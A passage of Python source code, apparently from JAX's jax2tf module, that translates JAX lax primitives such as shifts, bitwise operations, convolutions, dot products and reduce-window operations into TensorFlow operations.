return tf.math.truediv(lhs, rhs)
def _rem(lhs, rhs):
return tf.math.sign(lhs) * tf.math.floormod(tf.math.abs(lhs),
tf.math.abs(rhs))
tf_impl[lax.div_p] = _div
tf_impl[lax.rem_p] = _rem
tf_impl[lax.max_p] = tf.math.maximum
tf_impl[lax.min_p] = tf.math.minimum
# Map from TF signed types to TF unsigned types.
_SIGNED_TO_UNSIGNED_TABLE = {
tf.int8: tf.uint8,
tf.int16: tf.uint16,
tf.int32: tf.uint32,
tf.int64: tf.uint64,
}
# Map from TF unsigned types to TF signed types.
_UNSIGNED_TO_SIGNED_TABLE = {u: s for s, u in _SIGNED_TO_UNSIGNED_TABLE.items()}
# Note: Bitwise operations only yield identical results on unsigned integers!
# pylint: disable=protected-access
def _shift_right_arithmetic_raw(x, y):
if x.dtype.is_unsigned:
assert x.dtype == y.dtype
orig_dtype = x.dtype
signed_dtype = _UNSIGNED_TO_SIGNED_TABLE[orig_dtype]
x = tf.cast(x, signed_dtype)
y = tf.cast(y, signed_dtype)
res = tf.bitwise.right_shift(x, y)
return tf.cast(res, orig_dtype)
else:
return tf.bitwise.right_shift(x, y)
def _shift_right_arithmetic(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA
# semantics to return the shift by the max value (x_bits - 1).
# TODO: it is likely better to add XlaOps for shifts
x_bits = 8 * x.dtype.size
clamp_y = tf.where(_shift_in_bounds(x, y), y, x_bits - 1)
return _shift_right_arithmetic_raw(x, clamp_y)
tf_impl[lax.shift_right_arithmetic_p] = _shift_right_arithmetic
def _shift_right_logical_raw(x, y):
if x.dtype.is_unsigned:
return tf.bitwise.right_shift(x, y)
else:
assert x.dtype == y.dtype
orig_dtype = x.dtype
unsigned_dtype = _SIGNED_TO_UNSIGNED_TABLE[orig_dtype]
x = tf.cast(x, unsigned_dtype)
y = tf.cast(y, unsigned_dtype)
res = tf.bitwise.right_shift(x, y)
return tf.cast(res, orig_dtype)
def _shift_right_logical(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA semantics
# to return 0.
# TODO: it is likely better to add XlaOps for shifts
return tf.where(_shift_in_bounds(x, y),
_shift_right_logical_raw(x, y),
tf.zeros_like(x))
tf_impl[lax.shift_right_logical_p] = _shift_right_logical
def _shift_left(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA semantics
# to return 0.
# TODO: it is likely better to add XlaOps for shifts
return tf.where(_shift_in_bounds(x, y),
tf.bitwise.left_shift(x, y),
tf.zeros_like(x))
tf_impl[lax.shift_left_p] = _shift_left
def _shift_in_bounds(x: TfVal, y: TfVal) -> TfVal:
# Return the TF expression for when y is within bounds (0 <= y < |x|)
x_bits = 8 * x.dtype.size
# TF does not have comparisons for uint16 and uint32 (despite what the
# documentation says)
y_comp = tf.cast(y, _UNSIGNED_TO_SIGNED_TABLE[y.dtype]) if y.dtype.is_unsigned else y
y_lt_x_bits = tf.math.less(y_comp, x_bits)
y_ge_0 = tf.math.greater_equal(y_comp, 0)
return tf.logical_and(y_lt_x_bits, y_ge_0)
def _not(x):
"""Computes bitwise not with support for booleans.
Numpy and JAX support bitwise not for booleans by applying a logical not!
This means that applying bitwise_not yields an unexected result:
jnp.bitwise_not(jnp.array([True, False]))
>> DeviceArray([False, True], dtype=bool)
if you assume that booleans are simply casted to integers.
jnp.bitwise_not(jnp.array([True, False]).astype(np.int32)).astype(bool)
>> DeviceArray([True, True], dtype=bool)
"""
if x.dtype == tf.bool:
return tf.logical_not(x)
else:
return tf.bitwise.invert(x)
tf_impl[lax.not_p] = _not
def bool_to_int8(f, argnums):
"""Computes bool valued functions using int8."""
argnums = tf.nest.flatten(argnums)
def wrapper(*args, **kwargs):
if not any(args[i].dtype == tf.bool for i in argnums):
return f(*args, **kwargs)
else:
args_cast = [(tf.cast(a, tf.int8) if i in argnums else a)
for i, a in enumerate(args)]
if "_in_avals" in kwargs:
def cast_aval(aval):
return core.ShapedArray(aval.shape, np.int8)
_in_avals_cast = [cast_aval(aval) if i in argnums else aval
for i, aval in enumerate(kwargs["_in_avals"])]
_out_aval_cast = tf.nest.map_structure(cast_aval, kwargs["_out_aval"])
kwargs = dict(kwargs, _in_avals=_in_avals_cast, _out_aval=_out_aval_cast)
out = f(*args_cast, **kwargs)
return tf.nest.map_structure(lambda o: tf.cast(o, tf.bool), out)
return wrapper
tf_impl[lax.or_p] = bool_to_int8(tf.bitwise.bitwise_or, argnums=(0, 1))
tf_impl[lax.and_p] = bool_to_int8(tf.bitwise.bitwise_and, argnums=(0, 1))
tf_impl[lax.xor_p] = bool_to_int8(tf.bitwise.bitwise_xor, argnums=(0, 1))
tf_impl[lax.eq_p] = tf.math.equal
tf_impl[lax.ne_p] = tf.math.not_equal
tf_impl[lax.ge_p] = tf.math.greater_equal
tf_impl[lax.gt_p] = tf.math.greater
tf_impl[lax.le_p] = tf.math.less_equal
tf_impl[lax.lt_p] = tf.math.less
tf_impl[lax_linalg.cholesky_p] = tf.linalg.cholesky
def _convert_element_type(operand, *, new_dtype, weak_type=False):
old_dtype = operand.dtype.as_numpy_dtype
if (dtypes.issubdtype(old_dtype, np.complexfloating) and
not dtypes.issubdtype(new_dtype, np.complexfloating)):
operand = tf.math.real(operand)
if (dtypes.issubdtype(old_dtype, np.floating) and
not (dtypes.issubdtype(new_dtype, np.floating) or
dtypes.issubdtype(new_dtype, np.complexfloating) or
new_dtype == np.bool_)):
sign = tf.math.sign(operand)
operand = sign * tf.math.floor(sign * operand)
return tf.dtypes.cast(operand, to_tf_dtype(new_dtype))
tf_impl[lax.convert_element_type_p] = _convert_element_type
def _bitcast_convert_type(operand, new_dtype):
return tf.bitcast(operand, to_tf_dtype(new_dtype))
tf_impl[lax.bitcast_convert_type_p] = _bitcast_convert_type
def _clamp(minval, operand, maxval):
# The below permits mirroring the behavior of JAX when maxval < minval
maxval = tf.broadcast_to(maxval, operand.shape)
minval = tf.math.minimum(tf.broadcast_to(minval, operand.shape), maxval)
return tf.clip_by_value(operand, minval, maxval)
tf_impl[lax.clamp_p] = _clamp
def _concatenate(*operands, dimension):
return tf.concat(operands, axis=dimension)
tf_impl[lax.concatenate_p] = _concatenate
def _conv_general_dimension_numbers_proto(dimension_numbers):
"""Converts a ConvDimensionNumbers to an XLA ConvolutionDimensionNumbers."""
assert isinstance(dimension_numbers, lax.ConvDimensionNumbers)
lhs_spec, rhs_spec, out_spec = dimension_numbers
proto = xla_data_pb2.ConvolutionDimensionNumbers()
proto.input_batch_dimension = lhs_spec[0]
proto.input_feature_dimension = lhs_spec[1]
proto.output_batch_dimension = out_spec[0]
proto.output_feature_dimension = out_spec[1]
proto.kernel_output_feature_dimension = rhs_spec[0]
proto.kernel_input_feature_dimension = rhs_spec[1]
proto.input_spatial_dimensions.extend(lhs_spec[2:])
proto.kernel_spatial_dimensions.extend(rhs_spec[2:])
proto.output_spatial_dimensions.extend(out_spec[2:])
return proto
def _conv_general_precision_config_proto(precision):
"""Convert an integer to an XLA.PrecisionConfig."""
if precision is None:
return None
proto = xla_data_pb2.PrecisionConfig()
proto.operand_precision.append(int(precision))
return proto
# _try_tf_conv returns a Tensor when it succeeds, or a string describing why
# it did not succeed otherwise.
def _try_tf_conv(lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count,
out_shape) -> Union[str, TfVal]:
# TODO(bchetioui): this function is not exhaustive wrt which convolution cases
# can be translated into TF primitives. Further investigation is needed to
# fully flesh it out.
if not lhs.dtype in [tf.float16, tf.float32, tf.float64]:
return f"tf.nn.convolution is not supported for dtype {lhs.dtype}"
if feature_group_count != 1:
return "tf.nn.convolution does not support grouped convolutions"
# TODO(bchetioui): is there something to do with batch_group_count?
if batch_group_count != 1:
return "Unimplemented support for batch_group_count != 1"
nb_spatial_dimensions = len(lhs.shape) - 2
# TF can only deal with 1D, 2D and 3D convolution
if nb_spatial_dimensions < 1 or nb_spatial_dimensions > 3:
return ("TensorFlow can only handle convolutions with 1, 2, or 3 "
"spatial dimensions")
# TODO(bchetioui): handle different stride cases
if list(window_strides) != [1] * nb_spatial_dimensions:
return ("Unimplemented support for window_strides != "
f"{tuple([1] * nb_spatial_dimensions)}")
success = lambda res: (res, None)
failure = lambda msg: (None, msg)
def convert_padding():
# TODO(bchetioui): in this instance, we can not use padtype_to_pads as
# string padding is not implemented for transposed convolution.
if list(lhs_dilation) != [1] * nb_spatial_dimensions:
return failure("Padding conversion is not supported for transposed "
"convolution.")
lhs_perm, rhs_perm, _ = dimension_numbers
effective_rhs_shape = [(k-1) * r + 1 for k, r in
zip(np.take(rhs.shape, rhs_perm)[2:], rhs_dilation)]
lhs_shape = np.take(lhs.shape, lhs_perm)[2:]
# TF only allows 'VALID' and 'SAME' padding
for pad_str in ['VALID', 'SAME']:
gen_padding = lax.padtype_to_pads(
lhs_shape, effective_rhs_shape, window_strides, pad_str)
if list(gen_padding) == list(padding):
return success(pad_str)
return failure("Input padding not supported in TensorFlow.")
def convert_dim_nums():
lhs_spec, rhs_spec, out_spec = dimension_numbers
# TF only allows filters with shape:
# spatial_filter_shape + [in_channels, out_channels]. In JAX however,
# rhs_spec is represented as a tuple containing the following:
# [out_channels, in_channels] + spatial_filter_shape.
supported_rhs_shape = ([nb_spatial_dimensions + 1, nb_spatial_dimensions] +
list(range(nb_spatial_dimensions)))
if list(rhs_spec) != supported_rhs_shape:
return failure("Input filter (RHS) shape format not supported in "
"TensorFlow")
# TF only supports same LHS and output data format
if lhs_spec != out_spec:
return failure("TensorFlow requires the same data format for LHS and "
"output.")
# Alphabet extracted from the documentation of tf.conv{1,2,3}d
spatial_dim_alphabet = 'DHW'[-nb_spatial_dimensions:]
# TF only supports the following data formats:
# - [batch_size, in_channels] + input_spatial_shape
# TODO(bchetioui): TF currently does not support the above on CPU. To avoid
# failing on this platform, this path is commented out for now.
#if list(lhs_spec) == list(range(len(lhs_spec))):
# return "NC" + spatial_dim_alphabet
# - [batch_size] + input_spatial_shape + [in_channels]
if list(lhs_spec) == ([0, len(lhs_spec) - 1] +
list(range(1, len(lhs_spec) - 1))):
return success("N" + spatial_dim_alphabet + "C")
return failure("Data format is unsupported by TensorFlow")
def convert_dilation_and_compute_result(tf_padding, tf_dim_nums):
no_dilation = [1] * nb_spatial_dimensions
# TODO(bchetioui): is there a generic way to do a transposed atrous
# convolution in TensorFlow?
if not (list(lhs_dilation) == no_dilation or
list(rhs_dilation) == no_dilation):
return "Both LHS and RHS dilations are set"
# This is a non-dilated or atrous convolution
if list(lhs_dilation) == no_dilation:
return tf.nn.convolution(
lhs, rhs, strides=window_strides, padding=tf_padding,
data_format=tf_dim_nums, dilations=rhs_dilation)
# TODO(bchetioui): the below path is unreachable for now, as passing a lhs
# dilation to this function will result in convert_padding returning None
# systematically. This must be investigated further.
# Dilation of the LHS is transposed convolution
return tf.nn.conv_transpose(
lhs, rhs, out_shape, window_strides, padding=tf_padding,
data_format=tf_dim_nums, dilations=lhs_dilation)
tf_padding, error = convert_padding()
if tf_padding is None:
return error
tf_dim_nums, error = convert_dim_nums()
if tf_dim_nums is None:
return error
return convert_dilation_and_compute_result(tf_padding, tf_dim_nums)
def _conv_general_dilated(lhs, rhs, window_strides, padding, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count,
batch_group_count, lhs_shape, rhs_shape, precision,
_in_avals, _out_aval):
"""Implementation of lax.conv_general_dilated_p using XlaConv."""
if not _enable_xla:
info_or_result = _try_tf_conv(
lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count, _aval_to_tf_shape(_out_aval)
)
if not isinstance(info_or_result, str):
return info_or_result
else:
raise _xla_path_disabled_error("conv_general_dilated")
dnums_proto = _conv_general_dimension_numbers_proto(dimension_numbers)
precision_config_proto = _conv_general_precision_config_proto(precision)
assert batch_group_count == 1 # TODO(phawkins): implement batch_group_count
out = tfxla.conv(
lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dnums_proto, feature_group_count=feature_group_count,
precision_config=precision_config_proto)
# TODO: implement shape inference for XlaConv
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.conv_general_dilated_p] = _conv_general_dilated
def _dot_general(lhs, rhs, dimension_numbers, precision, preferred_element_type):
"""Implementation of lax.dot_general_p in terms of tf.linalg.einsum."""
del precision
del preferred_element_type
(lhs_contracting, rhs_contracting), (lhs_batch, rhs_batch) = dimension_numbers
lhs_dim, rhs_dim = len(lhs.shape), len(rhs.shape)
# This condition ensures that:
# 1) the considered dtype is not tf.bfloat16/tf.int32, which are supported by
# tf.linalg.einsum but not by tf.linalg.matmul;
# 2) the batch dimensions are ordered in the same way in lhs and rhs (this is
# not strictly necessary, but we would have to reshape the array if that
# were not the case;
# 3) lhs and rhs have the same number of dimensions +/- 1
# 4) the number of non-batch dimensions in both tensors is either 1 or 2
# 5) the contracting dimensions are consistent with those of a classic
# matrix/matrix, vector/matrix or matrix/vector multiplication.
if (not lhs.dtype in [tf.bfloat16, tf.int32]
and lhs_batch == rhs_batch == tuple(range(len(lhs_batch)))
and lhs_dim - rhs_dim in [-1, 0, 1]
and 1 <= lhs_dim - len(lhs_batch) <= 2
and 1 <= rhs_dim - len(rhs_batch) <= 2
and lhs_contracting == (len(lhs.shape) - 1,)
and rhs_contracting == (len(lhs_batch),)):
# All the inputs to tf.linalg.matmul must have 2 inner dimensions,
# after their batch dimensions, so we need to expand the dimensions
# appropriately. We can get to this branch with three combinations of
# inner shapes:
# - lhs.inner_shape == [a, b], rhs.inner_shape == [b, c]
# - in this case, the resulting inner shape is [a, c];
# - lhs.inner_shape == [b] , rhs.inner_shape == [b, c]
# - in this case, we need to expand lhs to [1, b], and the resulting
# shape is [c]. We need to squeeze the result of tf.linalg.matmul
# as it will have shape [1, c];
# - lhs.shape == [batch] + [a, b], rhs.shape == [batch] + [b]
# - in this case, we need to expand rhs to [b, 1], and the resulting
# shape is [a]. We need to squeeze the result of tf.linalg.matmul
# as it will have shape [a, 1];
# - lhs.shape == [batch] + [b] , rhs.shape == [batch] + [b]
# - in this case, we need to expand lhs to [1, b] and rhs to [b, 1],
# and the resulting shape is (). We need to squeeze the result of
# tf.linalg.matmul as it will have shape [1, 1].
squeeze_idxs = []
if lhs_dim - len(lhs_batch) == 1:
lhs = tf.expand_dims(lhs, lhs_dim - 1)
squeeze_idxs.append(len(lhs.shape) - 2)
if rhs_dim - len(rhs_batch) == 1:
rhs = tf.expand_dims(rhs, rhs_dim - 2)
squeeze_idxs.append(len(rhs.shape) - 1)
result = tf.linalg.matmul(lhs, rhs)
if len(squeeze_idxs) != 0:
result = tf.squeeze(result, squeeze_idxs)
return result
new_id = iter(string.ascii_letters)
lhs_axis_ids = [next(new_id) for _ in lhs.shape]
rhs_axis_ids = [next(new_id) for _ in rhs.shape]
lhs_out_axis_ids = lhs_axis_ids[:]
rhs_out_axis_ids = rhs_axis_ids[:]
for lhs_axis, rhs_axis in zip(lhs_contracting, rhs_contracting):
shared_id = next(new_id)
lhs_axis_ids[lhs_axis] = shared_id
rhs_axis_ids[rhs_axis] = shared_id
lhs_out_axis_ids[lhs_axis] = None
rhs_out_axis_ids[rhs_axis] = None
batch_ids = []
for lhs_axis, rhs_axis in zip(lhs_batch, rhs_batch):
shared_id = next(new_id)
lhs_axis_ids[lhs_axis] = shared_id
rhs_axis_ids[rhs_axis] = shared_id
lhs_out_axis_ids[lhs_axis] = None
rhs_out_axis_ids[rhs_axis] = None
batch_ids.append(shared_id)
not_none = lambda x: x is not None
out_axis_ids = list(filter(
not_none, batch_ids + lhs_out_axis_ids + rhs_out_axis_ids))
assert lhs.dtype == rhs.dtype
spec = "{},{}->{}".format("".join(lhs_axis_ids),
"".join(rhs_axis_ids),
"".join(out_axis_ids))
return tf.linalg.einsum(spec, lhs, rhs)
tf_impl[lax.dot_general_p] = _dot_general
def _broadcast(operand, *, sizes):
result_shape = tf.TensorShape(sizes).concatenate(operand.shape)
return tf.broadcast_to(operand, result_shape)
tf_impl[lax.broadcast_p] = _broadcast
def _broadcast_in_dim(operand, *, shape, broadcast_dimensions):
inshape = [1] * len(shape)
for orig_shape_i, broadcast_dim_i in zip(operand.shape, broadcast_dimensions):
if orig_shape_i != 1: inshape[broadcast_dim_i] = shape[broadcast_dim_i]
inshape_tf = _eval_shape(inshape)
shape_tf = _eval_shape(shape)
return tf.broadcast_to(tf.reshape(operand, inshape_tf), shape_tf)
tf_impl[lax.broadcast_in_dim_p] = _broadcast_in_dim
def _reshape(operand, *, new_sizes, dimensions):
if dimensions is None:
dimensions = tf.range(tf.rank(operand))
new_sizes_tf = _eval_shape(new_sizes)
return tf.reshape(tf.transpose(operand, dimensions), new_sizes_tf)
tf_impl[lax.reshape_p] = _reshape
def _squeeze(operand, *, dimensions, _in_avals, _out_aval):
op_shape = _in_avals[0].shape
new_shape = tuple(d for i, d in enumerate(op_shape) if i not in dimensions)
new_shape_tf = _eval_shape(new_shape)
return tf.reshape(operand, new_shape_tf)
tf_impl_with_avals[lax.squeeze_p] = _squeeze
def _pad(operand, padding_value, *, padding_config,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
del _in_avals
low, high, interior = util.unzip3(padding_config)
if all(lo >= 0 and hi >= 0 and i == 0 for lo, hi, i in padding_config):
return tf.pad(operand, util.safe_zip(low, high),
mode="CONSTANT", constant_values=padding_value)
if not _enable_xla:
raise _xla_path_disabled_error("pad")
out = tfxla.pad(operand, padding_value, low, high, interior)
return out
tf_impl_with_avals[lax.pad_p] = _pad
def _rev(operand, *, dimensions):
return tf.reverse(operand, dimensions)
tf_impl[lax.rev_p] = _rev
tf_impl[lax.select_p] = tf.where
def _transpose(operand, *, permutation):
return tf.transpose(operand, perm=permutation)
tf_impl[lax.transpose_p] = _transpose
axes_to_axis = lambda func: lambda operand, axes: func(operand, axis=axes)
tf_impl[lax.reduce_sum_p] = (
bool_to_int8(axes_to_axis(tf.reduce_sum), argnums=0))
tf_impl[lax.reduce_prod_p] = (
bool_to_int8(axes_to_axis(tf.reduce_prod), argnums=0))
tf_impl[lax.reduce_max_p] = (
bool_to_int8(axes_to_axis(tf.reduce_max), argnums=0))
tf_impl[lax.reduce_min_p] = (
bool_to_int8(axes_to_axis(tf.reduce_min), argnums=0))
tf_impl[lax.reduce_or_p] = axes_to_axis(tf.reduce_any)
tf_impl[lax.reduce_and_p] = axes_to_axis(tf.reduce_all)
def _argminmax(fn, operand, axes, index_dtype):
axis, = axes
output_type = tf.int32
if dtypes.iinfo(index_dtype).bits > 32:
output_type = tf.int64
# TODO(phawkins): handle axes larger than 2^31.
result = fn(operand, axis=axis, output_type=output_type)
return tf.cast(result, to_tf_dtype(index_dtype))
tf_impl[lax.argmin_p] = functools.partial(_argminmax, tf.math.argmin)
tf_impl[lax.argmax_p] = functools.partial(_argminmax, tf.math.argmax)
_add_fn = tf.function(_add, autograph=False)
_ge_fn = tf.function(tf.math.greater_equal, autograph=False)
def _select_and_gather_add(tangents: TfVal,
operand: TfVal,
select_prim: core.Primitive,
window_dimensions: Sequence[int],
window_strides: Sequence[int],
base_dilation: Sequence[int],
window_dilation: Sequence[int],
padding: Sequence[Tuple[int, int]],
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
# Note: this function follows the pattern in
# jax.lax._select_and_gather_add_translation.
dtype = operand.dtype
nbits = dtypes.finfo(dtype.as_numpy_dtype).bits
# Specializing the function for 64 bits. Only up to 32 bits are supported on TPU,
# we thus intend to let the code throw a different exception on this platform.
max_bits = 64
assert nbits <= max_bits
double_word_reduction = nbits * 2 <= max_bits
const = lambda dtype, x: tf.constant(np.array(x), dtype)
if double_word_reduction:
word_dtype = lax._UINT_DTYPES[nbits]
double_word_dtype = lax._UINT_DTYPES[nbits * 2]
# Packs two values into a tuple.
def pack(a, b):
a = _bitcast_convert_type(a, word_dtype)
b = _bitcast_convert_type(b, word_dtype)
a = _convert_element_type(a, new_dtype=double_word_dtype)
b = _convert_element_type(b, new_dtype=double_word_dtype)
a = tf.bitwise.left_shift(a, const(double_word_dtype, nbits))
return tf.bitwise.bitwise_or(a, b)
# Unpacks the first element of a tuple.
def fst(t):
assert t.dtype == double_word_dtype
st = _shift_right_logical(t, const(double_word_dtype, nbits))
return _bitcast_convert_type(
_convert_element_type(st, new_dtype=word_dtype), dtype
)
# Unpacks the second element of a tuple.
def snd(t):
return _bitcast_convert_type(
_convert_element_type(t, new_dtype=word_dtype), dtype
)
else:
raise NotImplementedError(f"TODO: need to pack {nbits * 2} bits but this platform can only go up to {max_bits} bits.")
assert select_prim is lax.ge_p or select_prim is lax.le_p, select_prim
def reducer(x, y):
which = tf_impl[select_prim]
return tf_impl[lax.select_p](which(fst(x), fst(y)), x=x, y=y)
init = -np.inf if select_prim is lax.ge_p else np.inf
init_identity = lambda x: pack(const(dtype, init), const(dtype, 0))
out = _specialized_reduce_window(reducer, init_identity,
pack(operand, tangents),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding, base_dilation=base_dilation,
window_dilation=window_dilation,
_in_avals=_in_avals, _out_aval=_out_aval)
return snd(out)
tf_impl_with_avals[lax.select_and_gather_add_p] = _select_and_gather_add
def _get_shape_from_tensor_or_array(x):
if isinstance(x.shape, tf.TensorShape):
return tuple(x.shape.as_list())
return tuple(x.shape)
def _common_reduce_window(operand, init_val, reducer, window_dimensions,
window_strides, padding, base_dilation,
window_dilation, _in_avals, _out_aval):
if not _enable_xla:
raise _xla_path_disabled_error("reduce_window")
o_spec = tf.TensorSpec((), dtype=operand.dtype)
reducer_fn = tf.function(reducer, autograph=False).get_concrete_function(o_spec, o_spec)
if not isinstance(init_val, tf.Tensor):
assert core.skip_checks or _is_tfval(init_val), f"Non TfVal: {init_val}"
init_val = tf.constant(init_val, operand.dtype)
out = tfxla.reduce_window(operand, init_val,
reducer_fn, window_dimensions,
window_strides, base_dilations=base_dilation,
window_dilations=window_dilation, padding=padding)
# TODO: implement shape inference for XlaReduceWindow
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
def _reduce_window(operand, init_value, *, jaxpr, consts, window_dimensions,
window_strides, padding, base_dilation, window_dilation,
_in_avals, _out_aval):
"""TensorFlow implementation of reduce_window.
Args:
operand: N dimensional array containing elements of type T
init_value: starting value of the reduction
jaxpr: the jaxpr corresponding to the reduction function
consts: the constants associated with jaxpr.
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
Returns:
The reduced operand.
"""
assert len(consts) == 0, "Reduction computation cannot have constants"
def reducer(arg1: TfVal, arg2: TfVal) -> TfVal:
closed_jaxpr = core.ClosedJaxpr(jaxpr, consts)
res, = _interpret_jaxpr(closed_jaxpr, arg1, arg2)
return res
return _common_reduce_window(
operand, init_value, reducer, window_dimensions, window_strides, padding,
base_dilation, window_dilation, _in_avals, _out_aval
)
# _try_tf_pool returns a Tensor when it succeeds, or a string describing why
# it did not succeed otherwise. It currently only supports reduce_window_max
# and reduce_window_sum.
# TODO(bchetioui): this function is not exhaustive wrt which
# reduce_window_max or reduce_window_sum cases can be translated into a call to
# max_pool or avg_pool. Further investigation is needed to fully flesh it out.
def _try_tf_pool(op_name, operand, window_dimensions, window_strides, padding,
base_dilation, window_dilation) -> Union[str, TfVal]:
# Contrarily to the main path, tf.int8 is actually a valid type for
# tf.nn.max_pool.
if op_name == "reduce_window_max" and operand.dtype in [
tf.bool, tf.uint32, tf.uint64, tf.complex64, tf.complex128
]:
return f"tf.nn.max_pool does not support operands of type {operand.dtype}"
if op_name == "reduce_window_sum" and operand.dtype not in [
tf.float16, tf.float32, tf.float64
]:
return f"tf.nn.avg_pool does not support operands of type {operand.dtype}"
has_batch_dim = window_dimensions[0] == 1
has_channel_dim = window_dimensions[-1] == 1
nb_spatial_dimensions = len(operand.shape) - has_batch_dim - has_channel_dim
if nb_spatial_dimensions < 1 or nb_spatial_dimensions > 3:
return ("TensorFlow can only handle pooling for arrays with 1, 2, or "
"3 spatial dimensions")
# TODO(bchetioui): does a simple conversion with another base dilation exist?
if list(base_dilation) != [1] * len(operand.shape):
return "Unimplemented support for base dilation"
# TODO(bchetioui): does a simple conversion with another window_dilation
# exist? The whole story seems similar to convolution.
if list(window_dilation) != [1] * len(operand.shape):
return "Unimplemented support for window dilation"
if list(padding) != [(0, 0)] * len(operand.shape):
return "Unimplemented support for padding"
# ReduceWindow in XLA takes an array of rank N as a parameter, but
# tf.nn.max_pool / tf.nn.avg_pool take an array of rank N+2, with a default
# shape of the form [batch_size] + input_spatial_shape + [num_channels]
tf_operand = operand
tf_window_dimensions = list(window_dimensions)
tf_window_strides = list(window_strides)
if not has_batch_dim:
tf_operand = tf.expand_dims(tf_operand, 0)
tf_window_dimensions = [1] + tf_window_dimensions
tf_window_strides = [1] + tf_window_strides
if not has_channel_dim:
tf_operand = tf.expand_dims(tf_operand, -1)
tf_window_dimensions.append(1)
tf_window_strides.append(1)
tf_data_format = "N" + "DHW"[-nb_spatial_dimensions:] + "C"
tf_padding = "VALID"
if op_name == "reduce_window_max":
result = tf.nn.max_pool(tf_operand, tf_window_dimensions, tf_window_strides,
tf_padding, tf_data_format)
elif op_name == "reduce_window_sum":
avg = tf.nn.avg_pool(tf_operand, tf_window_dimensions, tf_window_strides,
tf_padding, tf_data_format)
result = avg * np.prod(tf_window_dimensions)
else:
return f"Unimplemented support for {op_name}"
if not has_batch_dim:
result = tf.squeeze(result, 0)
if not has_channel_dim:
result = tf.squeeze(result, -1)
return result
def _specialized_reduce_window(reducer, identity, operand, *, window_dimensions,
window_strides, padding, base_dilation,
window_dilation, _in_avals, _out_aval,
name=None):
"""Wraps the TensorFlow reduce window operation based on a reducer and an
identity function defining the initial value of the reduction depending on
the dtype of the operand.
Args:
reducer: reduction function of type TfVal -> TfVal -> TfVal
identity: function that takes a TensorFlow dtype as a parameter and returns
the starting value of the reduction.
operand: N dimensional array containing elements of type T
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
name: the name of the specialized reduce window primitive for which this
conversion function is called. This information may help to choose a
different conversion path (optional)
Returns:
The reduced operand.
"""
if name in ["reduce_window_max", "reduce_window_sum"]:
res = _try_tf_pool(name, operand, window_dimensions, window_strides,
padding, base_dilation, window_dilation)
if not isinstance(res, str):
return res
return _common_reduce_window(
operand, identity(operand.dtype), reducer, window_dimensions,
window_strides, padding, base_dilation, window_dilation, _in_avals,
_out_aval
)
def _get_max_identity(tf_dtype):
numpy_tf_dtype = tf_dtype.as_numpy_dtype
if tf_dtype == tf.bfloat16 or dtypes.issubdtype(numpy_tf_dtype, np.inexact):
return numpy_tf_dtype(-np.inf)
elif dtypes.issubdtype(numpy_tf_dtype, np.integer):
return dtypes.iinfo(numpy_tf_dtype).min
else:
assert dtypes.issubdtype(numpy_tf_dtype, np.bool_), (
f"{tf_dtype} has no defined max identity"
)
return False
def _get_min_identity(tf_dtype):
numpy_tf_dtype = tf_dtype.as_numpy_dtype
if tf_dtype == tf.bfloat16 or dtypes.issubdtype(numpy_tf_dtype, np.inexact):
return numpy_tf_dtype(np.inf)
elif dtypes.issubdtype(numpy_tf_dtype, np.integer):
return dtypes.iinfo(numpy_tf_dtype).max
else:
assert dtypes.issubdtype(numpy_tf_dtype, np.bool_), (
f"{tf_dtype} has no defined min identity"
)
return True
# pylint: disable=protected-access
tf_impl_with_avals[lax.reduce_window_sum_p] = (
functools.partial(_specialized_reduce_window, _add, lambda x: 0,
name="reduce_window_sum"))
tf_impl_with_avals[lax.reduce_window_min_p] = (
functools.partial(_specialized_reduce_window, tf.math.minimum,
_get_min_identity, name="reduce_window_min"))
tf_impl_with_avals[lax.reduce_window_max_p] = (
functools.partial(_specialized_reduce_window, tf.math.maximum,
_get_max_identity, name="reduce_window_max"))
tf_impl_with_avals[lax.reduce_window_p] = _reduce_window
# pylint: enable=protected-access
# We use lax_control_flow._cumred_tpu_translation_rule to convert cummax,
# cummin, cumsum and cumprod. This is efficient on TPU, but the complexity is
# O(n^2) on other backends. This may be implemented using associative_scan
# instead to favor different backends.
tf_impl_with_avals[lax_control_flow.cummin_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_min), multiple_results=False)
tf_impl_with_avals[lax_control_flow.cummax_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_max), multiple_results=False)
# TODO(bchetioui): cumsum and cumprod can be converted using pure TF ops for
# certain dtypes: bfloat16, float16, float32, float64, and int32. Other dtypes
# will fail when running in compiled mode, but are otherwise compatible with
# the operation. A non-XLA path can thus be defined for all dtypes, though the
# tests will crash.
tf_impl_with_avals[lax_control_flow.cumsum_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_sum), multiple_results=False)
tf_impl_with_avals[lax_control_flow.cumprod_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_prod), multiple_results=False)
def _select_and_scatter(
operand, source, init_value, select_jaxpr, select_consts, scatter_jaxpr,
scatter_consts, window_dimensions, window_strides, padding):
raise NotImplementedError("TODO: jax2tf can not convert _select_and_scatter")
tf_impl[lax.select_and_scatter_p] = _select_and_scatter
@functools.partial(bool_to_int8, argnums=(0, 1))
def _select_and_scatter_add(source, operand, *, select_prim, window_dimensions,
window_strides, padding, _in_avals, _out_aval):
if not _enable_xla:
